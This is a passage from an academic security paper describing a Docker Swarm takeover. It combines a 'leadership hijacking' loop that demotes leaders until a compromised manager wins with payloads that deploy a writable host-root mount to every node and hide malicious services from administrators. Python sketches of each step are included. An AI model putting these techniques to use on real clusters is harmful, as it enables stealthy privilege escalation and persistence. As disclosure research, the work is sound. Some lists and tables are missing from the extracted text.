*2.2. Leader Election*

Raft [2] is a consensus algorithm used to manage a replicated log. Raft was designed to be an efficient and understandable algorithm that, unlike Paxos [6–8], would be easy to learn and to use in practical systems. Raft was chosen for Docker Swarm because of the following features:


Raft assumes that all nodes are honest. It does not tolerate malicious (Byzantine) nodes participating in the leader election process.

Byzantine fault-tolerant (BFT) leader election algorithms have existed for a long time. These algorithms can tolerate failures in networks where some nodes are Byzantine. For example, Castro et al. [9,10] described a state machine replication algorithm able to tolerate Byzantine faults. The algorithm guarantees safety, i.e., all non-faulty nodes agree on each replicated log.
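The difference between the two fault models also shows up in the number of nodes needed to tolerate *f* faulty nodes. Raft relies on majority quorums, so it needs at least 2*f* + 1 nodes to tolerate *f* crashed nodes. The algorithm of Castro et al. needs at least 3*f* + 1 replicas to tolerate *f* Byzantine ones:

$$
n_{\text{Raft}} \ge 2f + 1, \qquad n_{\text{BFT}} \ge 3f + 1
$$

For example, tolerating a single faulty node takes three Raft managers but four BFT replicas.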

Bessani et al. [11] introduced an open-source Java library implementing robust BFT state machine replication. Key features of their implementation include reliability, modularity, and a flexible application programming interface (API). Moreover, their implementation achieved good performance and can tolerate real-world faults.

Castro et al. [9] implemented a BFT library that can be used to build highly available systems that tolerate Byzantine faults. They used the library to implement a Byzantine-fault-tolerant NFS file system and showed that the replicated file system can be even more efficient than the non-replicated version of NFS.

#### **3. Related Work**

When attacking a cloud-based application, an adversary may exploit classical application vulnerabilities, such as SQL injection, buffer overflow, and command injection. Using such vulnerabilities, an attacker can control the victim's container and the data inside it. Container escape exploits are another class of techniques: after successfully exploiting a container, the attacker exploits a vulnerability that allows them to escape from the container to the underlying host. Access to the underlying host grants the attacker access to the data and other containers that run on the compromised host.

There are many products and protocols that try to mitigate the above-mentioned techniques. First, Docker offers built-in protections (https://docs.docker.com/engine/security/ (accessed on 8 July 2021)), such as protecting the Docker daemon socket and encrypting data exchanged between the Docker daemon and public registries. These protections harden Docker hosts with a "security in depth" approach. In addition, software such as SELinux and AppArmor can strengthen container isolation and minimize the attack surface between containers and the host. Furthermore, Docker offers an image scanning service (https://docs.docker.com/engine/scan/ (accessed on 8 July 2021)), which can detect vulnerabilities in Docker images.

In the rest of this section, we review previous work on cloud security related to Docker. Table 1 summarizes the main differences between our work and related works.

Singh et al. [12] presented the primary techniques attackers use against cloud services. Attackers can use many potential attack vectors, including DoS and DDoS attacks [13,14], malware injection, and side-channel attacks [15–18]. Jensen et al. [19] demonstrated an attack on the software of the cloud itself and outlined the threat of flooding attacks on cloud systems. The authors suggested improving the cloud's security by first improving the security of the frameworks used in the cloud.

In [20], Liu et al. provided an overview of the latest technologies in cloud computing and discussed how Docker is integrated into cloud computing. According to Liu et al., the major difference between classic VMs and containers is that a VM contains not only the application and its dependencies but also an entire guest operating system. The authors listed rapid application deployment, portability across machines, a lightweight footprint, and minimal overhead as the main advantages of Docker over traditional VM-based virtualization software. Moreover, in [21], Marathe et al. described how to set up a computer cluster based on Docker Swarm and on Kubernetes and evaluated each of these platforms.

Xavier et al. [22] performed numerous experiments to evaluate the performance of container-based cloud environments compared with VM-based ones, as well as the trade-off between performance and isolation. They found that cloud environments would benefit from container-based solutions because these solutions achieve near-native performance.

**Table 1.** Comparison with related works.


Other research [28] identified a new attack surface in the Docker environment, namely indirect adversaries. Unlike a direct adversary, who exploits vulnerabilities in the cluster directly, an indirect adversary exploits third-party appliances (e.g., Docker Hub) to attack the Docker environment.

An overview of attack types and mitigations in cloud environments is given in [26]. Among others, Amara et al. described SQL injection as an "application level attack" used to obtain an initial foothold in the cluster, and hypervisor attacks as "VM level attacks" used for privilege escalation and breaking VM isolation. They also proposed mitigations for each of the attacks they described.

Moreover, Wu et al. [23] evaluated the security of container-based cloud services. They defined metrics upon which they evaluated a number of services, including a "privilege escalation" metric and a "container escape" metric. They found that, although some services failed the "privilege escalation" metric, the services scored very high on the "container escape" metric, which limits the impact of the attacker.

In his master's thesis, Kabbe [27] compared the security model of containers with that of hypervisor-based systems and virtual machines. He compared the outcome of known attacks (DirtyCow (https://nvd.nist.gov/vuln/detail/CVE-2016-5195 (accessed on 8 July 2021)), Heartbleed (https://nvd.nist.gov/vuln/detail/CVE-2014-0160 (accessed on 8 July 2021)), and Shellshock (https://nvd.nist.gov/vuln/detail/CVE-2014-6271 (accessed on 8 July 2021))) in a containerized environment with the outcome of the same attacks in hypervisor/virtual machine environments. He found that containers offered at least the same level of security as hypervisor/virtual machine environments.

In his master's thesis [25], Seather reviewed the underlying security of the Docker Swarm infrastructure. In particular, Seather tested many adversarial scenarios, including flooding the orchestrator with invalid or corrupted requests, sniffing the network from within the cluster, impersonating a cluster member, and performing man-in-the-middle attacks between containers within Docker's internal network, among others. The thesis concluded that Docker's infrastructure is secure, that Docker Swarm's design is sound from a security point of view, that the technology stack used by Docker is immune to known attacks, and that the development community responds quickly to security incidents.

An attack on cloud infrastructure is also shown in [24]. Linetskyi et al. demonstrated and utilized a Kubernetes privilege escalation exploit in which an attacker can obtain root privileges inside a container. If the container is misconfigured, this can result in root privileges on the underlying host. The bug resides in Kubernetes's management tool, which underscores that extra care should be taken to secure the code of the infrastructure itself (in that case, Kubernetes).

#### **4. Taking over the Docker Swarm**

In this section, we present new techniques that can be used to take over a Docker Swarm cluster. We present a full exploit chain that starts with an existing container escape exploit; when combined with our leadership hijacking technique, it ultimately gives the attacker cluster leader privileges. We then show how our malicious payloads can be used to completely compromise a cloud environment while evading detection.

#### *4.1. High-Level Overview*

A high-level overview of the end-to-end attack scenario can be seen in Figure 1. The attack consists of five major steps:


In order to demonstrate the feasibility and impact of the leadership hijacking technique and the malicious payloads, we developed an end-to-end attack scenario that shows how an external attacker can chain exploits seen in the wild with our technique and payloads, in order to obtain full control of a cluster. A detailed description of this scenario is provided in Section 5. Steps 1 and 2 are implemented in order to demonstrate the feasibility of our work, but they are not elaborated upon, since they are out of the scope of our research.

#### *4.2. Leadership Hijacking*

In this section, we introduce an adversarial technique named leadership hijacking. A precondition to employing this technique is code execution access to a manager node.

In Section 5, we show how this precondition can be achieved in a production environment. From now on, we will refer to the manager host compromised by the attacker as the attacker's manager. The main idea of our technique is to repeatedly trigger a leader election phase until the attacker's manager becomes the cluster leader.

The technique's pseudocode is shown in Algorithm 1.



As shown in Algorithm 1, the first step of the technique is to identify the current cluster leader. If the current leader is the attacker's manager, the technique exits. Otherwise, the technique starts a loop.

In each loop iteration, the technique demotes the current cluster leader to a worker node using Docker's demotion API [29], which also strips it of the leader role. This causes the cluster to run its leader election algorithm and elect a new leader. The first manager whose election timeout expires proposes itself as the cluster leader. Each manager then votes for one candidate, and the manager that receives a majority of the votes becomes the new cluster leader.

In the final step of the iteration, the current cluster leader is identified again. If the attacker's manager is the leader, the technique exits; otherwise, the loop continues until the attacker's manager becomes the cluster leader. To avoid detection through a repeated reduction in the number of available managers, the attacker promotes the demoted node back to the manager role [30] at the end of each leader election.
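The loop described above can be sketched in Python as follows. This is a reconstruction from the prose, not the authors' Algorithm 1. The `Cluster` interface (`leader`, `demote`, `promote`) is hypothetical and stands in for the Docker demotion and promotion APIs [29,30]. `SimulatedCluster` is a toy model in which demoting the leader elects a uniformly random remaining manager, and `max_iterations` is an added safety bound that does not appear in the text.

```python
import random
from typing import List, Protocol


class Cluster(Protocol):
    """Hypothetical control interface standing in for Docker's demote/promote APIs."""

    def leader(self) -> str: ...
    def demote(self, node: str) -> None: ...
    def promote(self, node: str) -> None: ...


class SimulatedCluster:
    """Toy model: demoting the leader triggers an election in which every
    remaining manager is equally likely to win (no timing or network effects)."""

    def __init__(self, managers: List[str], seed: int = 0) -> None:
        self.rng = random.Random(seed)
        self.managers = list(managers)
        self._leader = self.rng.choice(self.managers)

    def leader(self) -> str:
        return self._leader

    def demote(self, node: str) -> None:
        self.managers.remove(node)
        if node == self._leader:
            # The demoted node no longer leads; the remaining managers elect a new leader.
            self._leader = self.rng.choice(self.managers)

    def promote(self, node: str) -> None:
        if node not in self.managers:
            self.managers.append(node)


def hijack_leadership(cluster: Cluster, attacker: str, max_iterations: int = 1000) -> int:
    """Demote leaders until `attacker` is elected; return the number of elections triggered."""
    elections = 0
    while cluster.leader() != attacker:  # exits at once if the attacker already leads
        if elections >= max_iterations:
            raise RuntimeError("attacker's manager was not elected")
        demoted = cluster.leader()
        cluster.demote(demoted)   # forces a new leader election
        cluster.promote(demoted)  # restore the manager count to stay inconspicuous
        elections += 1
    return elections
```

For instance, `hijack_leadership(SimulatedCluster(["m1", "m2", "m3", "m4", "m5"], seed=1), "m3")` returns the number of elections needed in that run. Afterwards, the attacker is the leader and the manager set is unchanged.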

In order to prove that the technique works in practice, we implemented the pseudocode shown in Algorithm 1. We set up a lab to test the implementation, and its architecture is illustrated in Figure 3.

Running our implementation in the lab was successful: the attacker was able to escalate privileges and become the new cluster leader.

#### 4.2.1. Analysis

#### Convergence

In each iteration, the technique code demotes the leader. According to the Docker Swarm documentation, a manager that does not receive the heartbeat from the leader during the predefined time window assumes that the leader is unavailable and proposes itself to be the new cluster leader. Since the leader has been demoted, none of the managers receive the heartbeat from the leader, and hence a new leader election phase will start when the first manager reaches its timeout.

**Figure 3.** Overview of the lab architecture.

Docker Swarm closely follows the specification and implementation of Raft, in which the election timeout (the time a node waits before starting a new election) is drawn at random from a predefined range. Besides the election timeout, the probability of a given manager becoming the leader depends on communication delays and may not be the same for all managers [31]. Nevertheless, it is reasonable to assume that, in a properly configured swarm, every manager has a roughly equal probability of being elected.
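The following Python sketch illustrates why randomized timeouts give every manager a similar chance of becoming the first candidate. Each manager draws its election timeout uniformly from [*T*, 2*T*], and the sketch records whose timer fires first. The range is an assumption loosely modeled on the randomized timeouts of etcd's raft library. The model also assumes that the first candidate wins and ignores the communication delays mentioned above. Function names are illustrative.

```python
import random
from collections import Counter
from typing import Dict, List


def first_candidate(managers: List[str], rng: random.Random, base_timeout: float) -> str:
    """Return the manager whose randomized election timeout expires first."""
    # Assumed range [T, 2T]; each manager draws independently.
    timeouts = {m: rng.uniform(base_timeout, 2 * base_timeout) for m in managers}
    return min(timeouts, key=timeouts.get)


def candidate_frequencies(managers: List[str], trials: int, seed: int = 0,
                          base_timeout: float = 1.0) -> Dict[str, float]:
    """Empirical fraction of elections in which each manager times out first."""
    rng = random.Random(seed)
    counts = Counter(first_candidate(managers, rng, base_timeout) for _ in range(trials))
    return {m: counts[m] / trials for m in managers}
```

With three managers and tens of thousands of trials, each frequency should land close to 1/3. This matches the equal-probability assumption in the idealized case where delays are negligible.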

In the absence of an attacker, each leader election is independent of previous leader elections. This is because Raft nodes do not maintain any state concerning the leader election process other than being a follower, a candidate, or a leader (temporarily, more than one node may be in the leader state due to collisions, which Raft resolves). The attack introduces a slight dependency between iterations because the previously demoted leader is absent from the set of candidates.

The absence of a candidate cannot reduce the probability of the attacker's manager being elected. Thus, the probability that the attacker's manager is elected in each attack iteration is bounded from below by the probability that it is elected without the attack. The positive probability of success in each iteration, together with the attacker's ability to keep demoting leaders, guarantees the eventual success of the attack.

In a properly configured system, where each manager has the same probability of being elected, the mean number of leader elections until the attack succeeds is therefore at most the number of managers.
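The bound can be written out explicitly. Let *n* be the number of managers and *K* the number of leader elections until the attacker's manager wins. Assume, as argued above, that in every election the attacker's manager wins with probability at least 1/*n*, regardless of earlier outcomes. Then:

$$
\Pr[K > k] \le \left(1 - \frac{1}{n}\right)^{k} \xrightarrow[k \to \infty]{} 0,
\qquad
\mathbb{E}[K] = \sum_{k=0}^{\infty} \Pr[K > k] \le \sum_{k=0}^{\infty} \left(1 - \frac{1}{n}\right)^{k} = n.
$$

Equality holds when each election succeeds with probability exactly 1/*n*. Because the demoted leader is absent from each election, the actual mean can be lower.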

#### Advantages

The first advantage of the technique is its simple implementation. To prove its feasibility, we implemented the technique in the simplest way possible. After reviewing the Docker Swarm API, we realized that our technique could be implemented with repeated calls to the demote and promote APIs [29,30]. This simple implementation makes our technique stable and reliable.
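The following sketch shows how such calls could look with the Docker SDK for Python (the `docker` package). This is not the authors' implementation, and the helper names are illustrative. The leader is found through the `ManagerStatus.Leader` field of the node inspection data. A node's role is changed by resubmitting its current spec with a different `Role`, mirroring what `docker node demote` and `docker node promote` do from the CLI. `Node.update` removes any values not provided, so the full spec is copied before only `Role` is changed.

```python
import copy
from typing import Any, Iterable, Optional


def find_leader(nodes: Iterable[Any]) -> Optional[Any]:
    """Return the node whose inspect data reports ManagerStatus.Leader == True."""
    for node in nodes:
        status = node.attrs.get("ManagerStatus") or {}
        if status.get("Leader"):
            return node
    return None


def set_role(node: Any, role: str) -> bool:
    """Demote ("worker") or promote ("manager") a node via Node.update.

    reload() refreshes the spec and the version index that the update must
    carry; only Role is changed so the rest of the spec is preserved.
    """
    node.reload()
    spec = copy.deepcopy(node.attrs["Spec"])
    spec["Role"] = role
    return node.update(spec)
```

With a client from `docker.from_env()`, the managers can be listed with `client.nodes.list(filters={"role": "manager"})`. Calling `set_role(find_leader(managers), "worker")` triggers a new election, and `set_role(node, "manager")` later restores the demoted node.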

The second advantage of our technique is its stealthiness. A typical attacker would like to stay undetected for as long as possible during an engagement. Our technique can be implemented in many ways; however, some are rather loud and increase the chance of being caught by the system administrators. For example, an attacker could demote all other managers of the cluster and become the only manager and, hence, the cluster leader. The obvious issue with this implementation is that the system administrators will quickly notice that the cluster state has changed. In contrast, our implementation changes the cluster state only minimally, which makes the technique harder to detect.

#### Limitations

The main limitation of our technique is that it is probabilistic. Although we showed that our technique completes successfully with probability *P* → 1, the number of iterations in each execution may differ. An unknown number of iterations is particularly problematic in a real-world scenario.
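Although the number of iterations cannot be predicted for a single run, it can be bounded in probability. The sketch below computes the smallest number of leader elections *k* for which the attack succeeds with probability at least *q*. It assumes that each election independently succeeds with probability *p*, for example the conservative *p* = 1/*n*. The function name is illustrative.

```python
def elections_for_confidence(p: float, q: float) -> int:
    """Smallest k such that 1 - (1 - p)**k >= q.

    p: per-election probability that the attacker's manager is elected.
    q: desired overall success probability, 0 <= q < 1.
    Closed form: k = ceil(log(1 - q) / log(1 - p)); the loop avoids rounding issues.
    """
    if not 0 < p <= 1:
        raise ValueError("p must be in (0, 1]")
    if not 0 <= q < 1:
        raise ValueError("q must be in [0, 1)")
    k = 0
    failure = 1.0  # probability that none of the first k elections succeeded
    while failure > 1 - q:
        failure *= 1 - p
        k += 1
    return k
```

For example, with five managers and the conservative *p* = 1/5, `elections_for_confidence(0.2, 0.95)` returns 14. In other words, 14 elections suffice for a 95% chance of success.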

#### *4.3. Malicious Payloads*

In order to illustrate the impact of the leadership hijacking technique, we developed malicious payloads that use cluster leader privileges and used them to perform some malicious operations.

Typically, an attacker who has access to one host inside a cluster would like to spread and obtain a wider foothold in the cluster. Ideally, the attacker would like to have access to all hosts in the cluster, with high privileges on each host. Moreover, once the attacker controls a cluster, they would like to remain undetected by users and system administrators for as long as possible.

To achieve the above goals, the attacker has to find a way to spread inside the cluster and hide their malicious activity from users and monitoring tools. In this work, we introduce and develop two types of malicious payloads: a lateral movement payload and a defense evasion payload. These payloads utilize leader privileges and allow an attacker to execute high privileged code on every node in the cluster and hide from monitoring tools.

#### 4.3.1. Lateral Movement

Typically, an attacker would like to establish a wide foothold in a cluster, preferably with high privileges. In this work, we create a payload that enables lateral movement in the cloud. Using this payload, we demonstrate how an attacker with leader privileges in a Docker Swarm cluster can execute high privileged code on each host in the cluster.

Because a successful leadership hijacking gives the attacker leader privileges, the attacker can control all messages sent from the leader node. By hooking the leader's function responsible for sending messages to other nodes, the attacker can intercept these messages and alter their content.

To execute code on other nodes in the cluster, the attacker who controls the leader host can send the victim node a task to run. The attacker instructs the worker to run a container task with a malicious image controlled by the attacker. As we show in Section 5, the victim node executes the container.

However, the malicious container runs in an isolated environment in the host. As discussed in Section 3, containers run in a separate namespace from the host. Thus, for example, a process inside a container cannot sniff the host's network.

There are many ways to overcome this limitation. In addition to controlling which image the container runs on each host, the attacker also controls the container's creation flags. Thus, for example, the attacker can mount the host's main file system into the container. Then, from inside the container, the attacker can modify the host's executable files to include malicious code. To obtain highly privileged code execution, the attacker has to alter a file that is executed by a highly privileged user on the host. When that user executes the file, the attacker's malicious code is executed as well, resulting in highly privileged code execution on the host.
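The kind of deployment described above can be expressed as a Docker Engine API service specification. The following Python sketch builds such a spec. Global mode schedules one task on every available node, and a bind mount exposes a host directory inside each container. The service name, image, and mount target are placeholders. The dictionary follows the body shape of the Engine API `POST /services/create` endpoint. The CLI equivalent is `docker service create --mode global --mount type=bind,source=/,target=/host IMAGE`.

```python
from typing import Any, Dict


def global_service_with_host_mount(name: str, image: str,
                                   host_path: str = "/",
                                   target: str = "/host") -> Dict[str, Any]:
    """Engine API ServiceSpec: one task per node, with host_path bind-mounted at target."""
    return {
        "Name": name,
        "TaskTemplate": {
            "ContainerSpec": {
                "Image": image,
                "Mounts": [
                    {
                        "Type": "bind",       # mount a host path rather than a volume
                        "Source": host_path,  # path on each node's host
                        "Target": target,     # path inside the container
                        "ReadOnly": False,    # writable, so host files can be modified
                    }
                ],
            }
        },
        "Mode": {"Global": {}},  # one task on every available node
    }
```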

#### 4.3.2. Defense Evasion

With the above lateral movement payload, the attacker can spread and move laterally by deploying a service with a malicious image to every host in the cluster. In this subsection, we show how an attacker can remain undetected in the cluster and hide malicious activity from the cloud's management tools. We introduce the cloud defense evasion payload, which offers rootkit-like functionality in the cloud.

In this subsection, we assume that the attacker is the cluster leader and has a malicious service in the cluster, which they wish to hide from system administrators, e.g., a malicious cryptocurrency mining service.

The default Docker Swarm command line offers a rich variety of commands for cluster administration. In particular, Swarm offers the docker service (https://docs.docker.com/engine/reference/commandline/service/ (accessed on 8 July 2021)) command for viewing and updating services that run on the cluster. To view the services running on the cluster, the system administrator can issue the docker service ls (https://docs.docker.com/engine/reference/commandline/service\_ls/ (accessed on 8 July 2021)) command and view its output. The output includes each service's name, image, number of replicas, exposed ports, etc.

In order to obtain this information, the Docker daemon of the host that issued the command queries the leader of the cluster and retrieves the information from the leader.

However, the attacker controls the leader host. Hence, the attacker can hook the function on the leader's Docker daemon that returns this information and spoof the answers. In this way, the attacker can change the malicious service's name, image, or ports, or even hide the service itself (i.e., trick the user into thinking that no such service exists by removing any information related to the malicious service).
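Conceptually, the spoofing amounts to wrapping the leader-side function that produces the service list and filtering its result before it reaches the client. The Python sketch below illustrates only this filtering idea on a hypothetical in-process listing function. It does not model how a function inside the Docker daemon is actually hooked, and the names `hide_services` and `ServiceInfo` are illustrative.

```python
from typing import Callable, Dict, Iterable, List

ServiceInfo = Dict[str, str]


def hide_services(list_services: Callable[[], List[ServiceInfo]],
                  hidden_names: Iterable[str]) -> Callable[[], List[ServiceInfo]]:
    """Wrap a service-listing function so that services named in hidden_names are omitted."""
    hidden = frozenset(hidden_names)

    def hooked() -> List[ServiceInfo]:
        # Callers see the original listing minus the hidden services.
        return [svc for svc in list_services() if svc["Name"] not in hidden]

    return hooked
```

The same wrapper shape applies to the task listing behind docker service ps, where fields such as the image could be rewritten instead of filtered out.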

Similarly, the system administrator can view which containers are running for each service. Using the docker service ps (https://docs.docker.com/engine/reference/commandline/service\_ps/ (accessed on 8 July 2021)) command, the system administrator can obtain information about a container's image, name, state, etc. As with the docker service ls command, the issuing host queries the leader host and retrieves that information. Since the attacker has access to the leader host, they can alter that information as well. For example, the attacker can show the system administrator that a container is running a different image than the one it actually runs.

In this way, the attacker can hide malicious activity from Docker's default tools, which query the cluster leader to obtain information about objects (running services, containers, etc.) in the cluster.

#### **5. End-to-End Attack Showcase**

To prove that our leadership hijacking technique and malicious payloads are feasible, we implemented a combined scenario that demonstrates the impact of the technique and of the payloads. We show the importance of our technique and payloads, and we show that the initial assumption regarding the attack is reasonable. We provide a proof-of-concept demonstration of an external attacker who leverages an exploit seen in the wild, together with our leadership hijacking technique and malicious payloads, to ultimately control the entire cluster.
